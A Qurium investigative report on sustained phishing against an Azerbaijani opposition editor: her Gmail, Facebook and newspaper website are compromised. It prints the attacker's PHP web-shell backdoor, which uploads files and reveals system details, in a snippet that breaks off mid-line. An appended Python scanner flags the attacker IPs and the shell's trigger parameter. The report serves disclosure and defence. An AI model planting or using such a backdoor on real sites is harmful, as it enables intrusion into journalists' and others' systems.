TARGETED SOPHISTICATED PHISHING ATTACKS AGAINST DISSIDENTS IN AZERBAIJAN ARE TRENDING

During the past year Qurium has recorded an increase in targeted phishing attacks against independent media and human rights activists in Azerbaijan. The attacks are launched from infrastructure inside the country with total impunity.


The story of Fizza Eydarova, editor of Azadliq.info, is an example of how phishing attacks against regime-critical journalists and human rights defenders in Azerbaijan are getting more targeted and sophisticated. Additionally, phishing attacks are being launched from IP space belonging to AzerTelecom, one of the country’s largest Internet providers, with total impunity.

The attacker targeting Fizza used several attack vectors and managed to compromise her Gmail account and gain access to her WordPress account on Azadliq.info. In an attempt to ensure persistent access to the website, the attacker installed multiple backdoors on the site. However, all attempts to access the backdoors were blocked by Qurium, Azadliq’s hosting provider.
The attacker also made multiple attempts to compromise Fizza’s Facebook account, including sending fake SMS messages impersonating Facebook that redirected her to a fake Facebook login page.

The number of attack vectors used, and the fact that the attacks were carried out over a period of several months, shows a certain level of dedication and determination. The attacks have been carried out from IP address 134{.}19.217.249, which is the same IP address used to launch attacks against other independent media in Azerbaijan in the past, including Qurium’s core infrastructure.

This report summarizes the case of Fizza Heydarov, editor of Azadliq.info, one of the multiple cases we have investigated.

On 22 April 2019, Fizza Heydarov, editor of Azadliq (Azadlıq Qəzeti), reported:

“During my two years on Facebook, I haven’t had any special activity. I liked what my friends wrote, and I rarely wrote anything. Today my account has been hacked twice and my password has been changed. In both cases, I managed to recover it.”

Fizza reports on Facebook that her account has been hacked.

In April 2019, Fizza received a warning from Facebook that the account was being accessed from the IP address 134{.}19.217.249, belonging to AzerTelecom.

Warning from Facebook, access from unknown IP address.

The attacker had gained access to Fizza’s Gmail account and was resetting the password of her Facebook account. Once the attacker accessed the account, he tried to change the recovery e-mail to fizze.heyderova.16{@}bk.ru.

The attacker enters the azadliq.info website

With access to the editor’s Gmail account, the attacker searches the inbox and finds an e-mail containing the credentials to Azadliq.info’s website. On 23 April 2019, the attacker accessed the admin area of the website through a Tor exit node with IP address 65{.}19.167.132.

"65.19.167.132" "" "-" "23/Apr/2019:10:08:28 +0000" "1556014108.286" "GET" "/rightxxxx" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"

Soon after, the attacker installs a backdoor on the website. The code is reused from an old backdoor from 2017 by the defacer “Aissa Wolf1200”.

set_time_limit(0); error_reporting(0);
if(isset($_GET["rhs334"])){ echo "".php_uname().""; echo ""; echo "
"; if($_POST["v"]==up){ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo "berhasil-->".$_FILES["f"]["name"]; } else { echo "gagal"; } } }
if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } }
echo ' index.php
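As an added example, not part of the Qurium report: detection logic a site operator could run over access-log lines in the format quoted above. It flags requests from the report's attacker IP and Tor exit, admin-area access from those addresses, and any request carrying the backdoor's "rhs334" trigger parameter. The WordPress admin path prefixes are an assumption, and all sample log lines after the first one are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Log format as quoted in the report, one double-quoted field per column:
# "ip" "" "-" "timestamp" "epoch" "method" "path" "user-agent"
FIELD_RE = re.compile(r'"([^"]*)"')

# Indicators from the report: the AzerTelecom address, the Tor exit used to enter the
# admin area, and the backdoor's trigger parameter. ADMIN_PREFIXES is an assumption.
SUSPECT_IPS = {"134.19.217.249", "65.19.167.132"}
SHELL_PARAM = "rhs334"
ADMIN_PREFIXES = ("/wp-admin", "/wp-login.php")

def parse_line(line):
    """Split one log line into its fields; None if the line is not in this format."""
    fields = FIELD_RE.findall(line)
    if len(fields) < 8:
        return None
    ip, _, _, ts, _, method, path, ua = fields[:8]
    return {"ip": ip, "ts": ts, "method": method, "path": path, "ua": ua}

def findings(line):
    """Names of the indicators that match a single log line (empty list if none)."""
    rec = parse_line(line)
    if rec is None:
        return []
    hits = []
    if rec["ip"] in SUSPECT_IPS:
        hits.append("known-attacker-ip")
        if rec["path"].startswith(ADMIN_PREFIXES):
            hits.append("admin-access-from-suspect-ip")
    # The backdoor only runs when its trigger parameter is present in the query string.
    params = dict(parse_qsl(urlsplit(rec["path"]).query, keep_blank_values=True))
    if SHELL_PARAM in params:
        hits.append("backdoor-trigger")
    return hits

def scan(lines):
    """(ip, path, hits) for every line that matches at least one indicator."""
    recs = [(parse_line(l), findings(l)) for l in lines]
    return [(r["ip"], r["path"], h) for r, h in recs if h]

# Constructed sample: line 1 is the request quoted in the report, the rest are made up.
SAMPLE_LOG = [
    '"65.19.167.132" "" "-" "23/Apr/2019:10:08:28 +0000" "1556014108.286" "GET" "/rightxxxx" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"',
    '"65.19.167.132" "" "-" "23/Apr/2019:10:09:02 +0000" "1556014142.000" "POST" "/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"',
    '"198.51.100.7" "" "-" "24/Apr/2019:08:00:00 +0000" "1556092800.000" "GET" "/index.php?rhs334=1" "curl/7.64.0"',
    '"203.0.113.5" "" "-" "24/Apr/2019:09:00:00 +0000" "1556096400.000" "GET" "/2019/04/article/" "Mozilla/5.0"',
]
```

Running scan(SAMPLE_LOG) reports the first three lines and stays silent on the benign fourth one.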


Source: azadliq.info
